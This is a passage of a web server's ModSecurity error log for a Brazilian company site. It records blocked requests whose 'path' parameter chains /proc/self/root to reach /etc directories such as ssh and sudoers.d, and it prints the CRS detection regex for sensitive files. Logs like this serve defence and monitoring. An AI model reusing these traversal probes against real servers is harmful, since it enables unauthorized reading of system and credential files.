[Wed Mar 18 09:27:24.298627 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.243.128:48074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaLEzinOy1jxa1j4cGugAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:26.601468 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:48088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaLgkwaGbbGflqUZACdgAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:28.957456 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.243.128:48104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaMOw_le52K8_3pV3RhwAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:31.405116 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:50962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaM9Y0UrI5A3LftIyWXgAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:32.693819 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:50964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaNOyqAr6etmhZHNqxlgAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:39.055315 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:50980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaO0zinOy1jxa1j4cG1gAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:40.375401 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:32858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaPNY0UrI5A3LftIyWYQAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:42.102569 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:32864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaPdY0UrI5A3LftIyWYgAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:44.810809 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:32870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaQNa6ubjKNq_cu4aLdgAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:46.134513 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:32886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaQkzinOy1jxa1j4cG3QAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:49.703814 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:32902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaRda6ubjKNq_cu4aLfAAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:51.046251 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:38294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaR_u8EFLIOrSqIpv3SwAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:09.062032 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.241.31:35640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaWUzinOy1jxa1j4cG7QAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:28:13.005564 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:38300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaXSmAPhZkrhU8w4lfgAAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:14.332694 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:40194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaXsdf6f5d65gmYZTHBAAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:15.667206 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:40210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaX9a6ubjKNq_cu4aLiQAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:16.258345 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.244.43:57254] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqaYOoXxyEfFpUF8f9gnQAAAU0"]
[Wed Mar 18 09:28:16.619220 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.228.61:52184] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqaYPu8EFLIOrSqIpv3VAAAAkI"]
[Wed Mar 18 09:28:16.947218 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:40212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaYOw_le52K8_3pV3RnAAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:18.301873 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:40222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaYkzinOy1jxa1j4cG8AAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:19.575470 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:51000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaY-w_le52K8_3pV3RngAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:20.889889 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:51014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaZCmAPhZkrhU8w4lfgQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:28:23.266041 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:51016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 